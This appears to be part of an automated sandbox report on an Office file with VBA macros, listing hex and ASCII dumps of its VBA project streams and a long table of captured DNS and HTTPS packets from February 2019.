Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b2 00 00 03 00 ff 11 04 00 00 09 04 00 00 a4 03 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2418

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:	data
Stream Size:	2418
Entropy:	3.46373142152
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ R . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . i A . B . d Z M . . . . . . s . . . . . . . . .
Data Raw:	93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 220

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:	data
Stream Size:	220
Entropy:	1.88532024098
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N u m k . . . . . . . . . . . . . . . . p p Z . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 1611

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:	data
Stream Size:	1611
Entropy:	2.24757505734
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 11 0a 00 00 00 00 00 00 00 00 00 00 41 0a 00 00 00 00 00 00 00 00 00 00 71 0a

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 964

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:	data
Stream Size:	964
Entropy:	2.45901145421
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . X . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . @ . . . . . . . . . . . . . . . . ` . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 58 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 0c 01 81 08 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: VAX-order 68k Blit mpx/mux executable, Stream Size: 778

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	VAX-order 68k Blit mpx/mux executable
Stream Size:	778
Entropy:	6.44646645605
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . Q ^ . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 06 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 a4 03 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 c1 ff 51 5e 02 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 28, 2019 14:45:31.526434898 CET	51176	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:45:31.552546024 CET	53	51176	8.8.8.8	192.168.1.16
Feb 28, 2019 14:45:31.597244024 CET	49224	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:31.623514891 CET	443	49224	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:31.623585939 CET	49224	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:31.656676054 CET	49224	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:31.682893991 CET	443	49224	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:31.684735060 CET	443	49224	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:31.684767962 CET	443	49224	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:31.684791088 CET	443	49224	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:31.684828997 CET	49224	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:31.703794003 CET	49224	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:31.730367899 CET	443	49224	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:31.990777969 CET	49224	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.009304047 CET	443	49224	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.009470940 CET	49224	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.225802898 CET	49224	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.252314091 CET	443	49224	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.263221025 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.289340019 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.289572001 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.290787935 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.317184925 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.319487095 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.325957060 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.353271961 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.353311062 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.353327990 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.353348017 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.353368044 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.353383064 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.353401899 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.353420019 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.353437901 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.353456974 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.353585958 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.379817009 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.379875898 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.379901886 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.379930973 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.379961967 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.379986048 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.380009890 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.380033970 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.380060911 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.380084038 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.380126953 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.380143881 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.380152941 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.380181074 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.380208969 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.380234957 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.380254984 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.380274057 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.380297899 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.380388021 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.380953074 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.381517887 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.406413078 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.406486034 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.406552076 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.406604052 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.406677008 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.406698942 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.406729937 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.406784058 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.406866074 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.406907082 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.406929970 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.406974077 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407001972 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407028913 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407053947 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407080889 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407088995 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.407108068 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407136917 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407164097 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407191038 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407218933 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407246113 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407272100 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407301903 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407329082 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407337904 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.407355070 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407382011 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407408953 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407437086 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407464027 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407490015 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407495022 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.407519102 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407545090 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407569885 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407589912 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407614946 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407649040 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407675982 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407691002 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.407700062 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407727003 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.407820940 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.408489943 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.434293032 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.434356928 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.434401989 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.434457064 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.434518099 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.434550047 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.434550047 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.434603930 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.434653044 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.434683084 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.434715986 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.434761047 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.434828043 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.434830904 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.434880972 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.434957981 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.434989929 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435028076 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.435039997 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435113907 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435163975 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435220003 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435241938 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.435245991 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435272932 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435309887 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435319901 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435344934 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435369968 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435395956 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435424089 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435447931 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435458899 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.435473919 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435501099 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435528040 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435554981 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435579062 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435601950 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435606003 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.435626030 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435652018 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435666084 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435687065 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435709000 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435729980 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435755014 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435781002 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435806990 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435807943 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.435834885 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435858011 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435880899 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435909033 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435925961 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435949087 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435975075 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.435998917 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.436000109 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.436027050 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.436053038 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.436079979 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.436113119 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.436213970 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.437148094 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.462323904 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.462383032 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.462409019 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.462433100 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.462457895 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.462485075 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.462511063 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.462537050 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.462563038 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.462587118 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.462604046 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.462613106 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.462639093 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.462673903 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.462696075 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.462801933 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.463176966 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463247061 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463291883 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463300943 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.463318110 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463391066 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463419914 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463474989 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463479996 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.463505983 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463550091 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463579893 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.463598013 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463653088 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463679075 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.463727951 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463778973 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463819981 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.463835955 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463877916 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463921070 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463967085 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463992119 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.463994026 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.464019060 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464045048 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464071035 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464096069 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464118004 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.464133978 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464159012 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464188099 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464201927 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464222908 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464246988 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464268923 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464272022 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.464298010 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464322090 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464345932 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464369059 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464374065 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.464391947 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464416981 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464443922 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464468956 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464494944 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464498043 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.464520931 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464545965 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464570999 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464596033 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.464600086 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.464919090 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.465018034 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.466141939 CET	49225	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:45:32.488715887 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.488770962 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.488795042 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.488821983 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.488854885 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.488881111 CET	443	49225	151.101.36.193	192.168.1.16
Feb 28, 2019 14:45:32.488899946 CET	443	49225	151.101.36.193	192.168.1.16
